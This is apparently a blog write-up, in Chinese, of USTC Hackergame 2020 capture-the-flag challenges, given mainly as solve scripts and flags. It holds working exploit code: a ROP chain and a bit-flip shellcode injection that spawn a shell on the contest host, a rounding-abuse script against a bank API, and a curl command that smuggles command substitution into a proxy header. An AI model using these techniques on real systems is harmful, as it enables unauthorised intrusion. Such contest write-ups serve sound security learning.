CTF 安全

中国科学技术大学第七届信息安全大赛 —— USTC Hackergame 2020 WriteUp

前言

抽空玩了两天。没过程,只有解题脚本。

当前分数:3250, 总排名:31 / 2410

binary:600 , general:2000 , math:150 , web:500

0x00 Web - 签到

http://202.38.93.111:10000/?number=1

flag{hR6Ku81-HappyHacking2020-a297053b82}

0x01 General - 猫咪问答++

1. Docker,Golang,Plan 9,PHP,GNU,Perl,FireFox,MySQL,PostgreSQL,MariaDB,Apache Tomcat,Xfce
2. [RFC 1149] MTU 256 milligrams
3. https://ftp.lug.ustc.edu.cn/%E6%B4%BB%E5%8A%A8/2019.09.21_SFD/slides/%E9%97%AA%E7%94%B5%E6%BC%94%E8%AE%B2/Teeworlds/teeworlds.pdf
4. http://vr.shouxi360.com/index.php?m=content&c=index&a=show&catid=26&id=pNiHHxiHjPg
5. https://news.ustclug.org/2019/12/hackergame-2019/
12
256
9
9
17098

flag{b4a31f2a_G00G1e_1s_y0ur_fr13nd_eac1f4394c}

0x02 Web - 2048

首页源码提示 static/js/html_actuator.js

http://202.38.93.111:10005/getflxg?my_favorite_fruit=banana

flxg{8G6so5g-FLXG-2510119fa7}

0x03 General - 一闪而过的 Flag

拖到命令行里运行

flag{Are_you_eyes1ght_g00D?_can_you_dIst1nguish_1iI?}

0x04 General - 从零开始的记账工具人

import xlrd, re

def unit(i):
    if not len(i): return 0
    num = lambda i : ['', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖', '拾'].index(i)
    u = re.findall(r'(.*佰)?(.*拾)?(.*)', i)[0]
    return num(u[0][:-1].strip('零')) * 100 + num(u[1][:-1].strip('零')) * 10 + num(u[2].strip('零')) + (len(u[0]) == 1) * 100 + (len(u[1]) == 1) * 10


def parse(i):
    u = re.findall(r'(.*元)?(.*角)?(.*)', i)[0]
    return unit(u[0][:-1]) * 100 + unit(u[1][:-1]) * 10 + unit(u[2][:-1]) * 1


with xlrd.open_workbook('bills.xlsx') as wb: print('%.2f' % (sum([parse(wb.sheets()[0].cell_value(i, 0)) * int(wb.sheets()[0].cell_value(i, 1)) for i in range(1, wb.sheets()[0].nrows)]) / 100))

flag{18051.70}

0x05 General - 超简单的世界模拟器

package main

import (
    "bytes"
    "fmt"
    "math/rand"
    "time"
)

// Reference: https://golang.org/doc/play/life.go

type Field struct {
    s    [][]bool
    w, h int
}

func NewField(w, h int) *Field {
    s := make([][]bool, h)
    for i := range s {
        s[i] = make([]bool, w)
    }
    return &Field{s: s, w: w, h: h}
}

func (f *Field) Set(x, y int, b bool) {
    f.s[y][x] = b
}

func (f *Field) Alive(x, y int) bool {
    if x < 0 || x >= f.w || y < 0 || y >= f.w {
        return false
    }
    x += f.w
    x %= f.w
    y += f.h
    y %= f.h
    return f.s[y][x]
}

func (f *Field) Next(x, y int) bool {
    alive := 0
    for i := -1; i <= 1; i++ {
        for j := -1; j <= 1; j++ {
            if (j != 0 || i != 0) && f.Alive(x+i, y+j) {
                alive++
            }
        }
    }
    return alive == 3 || alive == 2 && f.Alive(x, y)
}

type Life struct {
    a, b *Field
    w, h int
}

func NewLife(w, h int) *Life {
    a := NewField(w, h)
    return &Life{
        a: a, b: NewField(w, h),
        w: w, h: h,
    }
}

func (l *Life) Step() {
    for y := 0; y < l.h; y++ {
        for x := 0; x < l.w; x++ {
            l.b.Set(x, y, l.a.Next(x, y))
        }
    }
    l.a, l.b = l.b, l.a
}

func (l *Life) String() string {
    var buf bytes.Buffer
    for y := 0; y < l.h; y++ {
        for x := 0; x < l.w; x++ {
            b := byte('0')
            if l.a.Alive(x, y) {
                b = '1'
            }
            buf.WriteByte(b)
        }
        buf.WriteByte('\n')
    }
    return buf.String()
}

func show(t int64) {
    rand.Seed(t)
    l := NewLife(15, 15)
    for i := 0; i < (15 * 15 / 4); i++ {
        l.a.Set(rand.Intn(15), rand.Intn(15), true)
    }
    fmt.Println(l)
}

func main() {
    s := 0
    for {
        t := time.Now().UnixNano()
        rand.Seed(t)
        l := NewLife(50, 50)
        l.a.Set(45, 5, true)
        l.a.Set(46, 5, true)
        l.a.Set(45, 6, true)
        l.a.Set(46, 6, true)
        l.a.Set(45, 25, true)
        l.a.Set(46, 25, true)
        l.a.Set(45, 26, true)
        l.a.Set(46, 26, true)
        for i := 0; i < (15 * 15 / 4); i++ {
            l.a.Set(rand.Intn(15), rand.Intn(15), true)
        }
        for i := 0; i < 200; i++ {
            l.Step()
        }
        m := 0
        if !l.a.Alive(45, 5) && !l.a.Alive(46, 5) && !l.a.Alive(45, 6) && !l.a.Alive(46, 6) {
            m++
        }
        if !l.a.Alive(45, 25) && !l.a.Alive(46, 25) && !l.a.Alive(45, 26) && !l.a.Alive(46, 26) {
            m++
        }
        if s == 0 {
            if m > 0 {
                show(t)
                s = 1
            }
        }else{
            if m > 1 {
                show(t)
                break
            }
        }

    }
}

蝴蝶效应

100000000010000
010000100100000
010000000000000
110010000000000
100000000000000
101010000000101
001000010001001
001000010100000
110010001110100
000000011000000
001100000000001
110000010111100
000000000000100
000010010000100
010011000000100

flag{D0_Y0U_l1k3_g4me_0f_l1fe?_d63de68291}

一石二鸟

001001000100000
001000000100000
100000110000100
001000000000000
100000100011000
101010100100001
000000100000100
110000100101101
000110000000010
110000010000110
100000000000010
000000000111100
000000001000100
000100001000100
010000010001011

flag{1s_th3_e55ence_0f_0ur_un1ver5e_ju5t_c0mputat1on?_4e2bf90f25}

0x06 General - 自复读的复读机

反向复读

exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY29udGVudFs6Oi0xXSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))

flag{Yes!_Y0U_h4v3_a_r3v3rs3d_Qu1ne_75e6983fa9}

哈希复读

exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlLCBoYXNobGliCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC53cml0ZShoYXNobGliLnNoYTI1Nihjb250ZW50KS5oZXhkaWdlc3QoKSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))

flag{W0W_Y0Ur_c0de_0utputs_1ts_0wn_sha256_40e965f438}

0x07 General - 233 同学的字符串工具

字符串大写工具

for a in range(255):
    for b in range(255):
        exec('c="\\u'+hex(a)[2:].upper().rjust(2,'0')+hex(b)[2:].upper().rjust(2,'0')+'"')
        if c.upper() == 'FL': print(c)

flag

flag{badunic0debadbad_010dc0f407}

编码转换工具

http://string-functions.com/encodingtable.aspx?encoding=65000&decoding=20127

观察规律,对字母进行编码

+AGY-lag

flag{please_visit_www.utf8everywhere.org_6b46279238}

0x08 General - 233 同学的 Docker

flag{Docker_Layers!=PS_Layers_hhh}

0x09 General - 从零开始的 HTTP 链接

mikrotik nat

flag{TCP_P0RT_0_1s_re5erved_BUT_w0rks_5e4ca20ca5}

0x0A General - 超简陋的 OpenGL 小程序

basic_lighting.vs文件里面,main函数第2行插入

if (FragPos.z > 0.2) FragPos = vec3(0.0, 0.0, 0.0);

flag{glGraphicsHappy(233);}

0x0B Binary - 生活在博弈树上

始终热爱大地

依次输入以下内容

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a1a1
a0a2
a1a0
a2a2

flag{easy_gamE_but_can_u_get_my_shell}

升上天空

from pwn import *
from struct import pack

# The code from `ROPgadget --binary tictactoe --ropchain`
p = ''
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e0) # @ .data
p += pack('<Q', 0x000000000043e52c) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000046d7b1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x0000000000439070) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046d7b1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004017b6) # pop rdi ; ret
p += pack('<Q', 0x00000000004a60e0) # @ .data
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x000000000043dbb5) # pop rdx ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x0000000000439070) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402bf4) # syscall

token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io = remote('202.38.93.111', 10141)
io.sendline(token)
io.sendlineafter('(0,1):', 'a'*(0x90+0x8) + p)
io.sendline('a1a1')
io.sendline('a0a2')
io.sendline('a1a0')
io.sendline('a2a2')
io.interactive()

flag{Get_the_she11_1s_not_so_hard_2571392e56}

0x0C General - 狗狗银行

四舍五入

import requests, json

url = 'http://202.38.93.111:10100'
headers = {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer 1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
}
timeout = 5
count = 50

assert count >= 30

requests.post(url + '/api/reset', data=json.dumps({}), headers=headers, timeout=timeout)
requests.post(url + '/api/create', data=json.dumps({"type":"credit"}), headers=headers, timeout=timeout)
requests.post(url + '/api/transfer', data=json.dumps({"src":2,"dst":1,"amount":167*count-1000}), headers=headers, timeout=timeout)
for i in range(count - 1):
    requests.post(url + '/api/create', data=json.dumps({"type":"debit"}), headers=headers, timeout=timeout)
    requests.post(url + '/api/transfer', data=json.dumps({"src":1,"dst":i+3,"amount":167}), headers=headers, timeout=timeout)

while True:
    requests.post(url + '/api/eat', data=json.dumps({"account":2}), headers=headers, timeout=timeout)
    for i in range(count + 1):
        requests.post(url + '/api/transfer', data=json.dumps({"src":i+1,"dst":2,"amount":1}), headers=headers, timeout=timeout)
    flag = json.loads(requests.get(url + '/api/user', headers={'Authorization':headers['Authorization']}, timeout=timeout).text)['flag']
    if flag:
        print(flag)
        break

flag{W0W.So.R1ch.Much.Smart.52f2d579}

0x0D General - 超基础的数理模拟器

from sympy import *
from sympy.parsing.latex import parse_latex
import requests

token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
url = 'http://202.38.93.111:10190'
s = requests.session()
e = 2.71828182845904523536
s.get(url + '/login', params={'token': token}, timeout=2)

def solve():
    r = s.get(url, timeout=2)
    expr = r.content.split('<p> $')[1].split('$</p>')[0]
    expr = expr.replace('\\left', '').replace('\\right', '').replace('\\,', '').replace('e', str(e)).replace('{d x}', '')
    integ = parse_latex(expr)
    try:
        result = float(integ)
    except:
        return False
    s.post(url + '/submit', data={'ans': '%.6f' % result}, timeout=2)
    return True

count = 0
while True:
    print count
    if solve():
        count += 1
    if count >= 400:
        print s.get(url, timeout=2).content
        break

flag{S0lid_M4th_Phy_Foundation_4c656e3f18}

0x0E Web - 超安全的代理服务器

找到 Secret

设置系统环境变量SSLKEYLOGFILE,Wireshark抓包使用SSLKEYLOGFILE解密TLS流量,重新打开浏览器访问网站,看到解密后的HTTP/2流量,有PUSH_PROMISE(SERVER PUSH),访问push过来的链接,拿到flag和secret。

flag{d0_n0t_push_me}

入侵管理中心

curl -v -k --proxy-insecure -x 'https://146.56.228.227' --proxy-header 'Secret: '\`curl -k https://146.56.228.227/00ea158a-0bda-45f5-b957-e1e89c489979 | grep -o "[a-f0-9]\\{10\\}"\` -H 'Referer: http://146.56.228.227:8080/' -p http://0.0.0.0:8080/

flag{c0me_1n_t4_my_h0use}

0x0F Binary - 超精准的宇宙射线模拟器

from pwn import *

def flip(addr, bit):
    io.sendlineafter('flip?', '%x %d' % (addr, bit))

def write(addr, old, new):
    assert len(old) >= len(new)
    for i in range(len(new)):
        for j in range(8):
            old_bit = (ord(old[i]) >> j) & 1
            new_bit = (ord(new[i]) >> j) & 1
            if old_bit != new_bit:
                flip(addr + i, j)

io = remote('202.38.93.111', 10231)
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io.sendline(token)
flip(0x401296, 4)
old = '\xB8P@@\x00H=P@@\x00t\x13\xB8\x00\x00\x00\x00H\x85\xC0t\x09\xBFP@@\x00\xFF\xE0f\x90'
new = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
write(0x401110, old, new)
flip(0x401296, 6)
io.interactive()

flag{B1t_fl1pfl1pfl1pfl1pfl1p_g0tshe11_owo_03d4de46a4}

0x10 Math - 不经意传输

解密消息

令 v = x0,则 m0 = m0_。

flag{U_R_0n_Th3_ha1f_way_0f_succe55_w0rk_h4rder!_b3fbc0785f}


标签: CTF 安全

Comments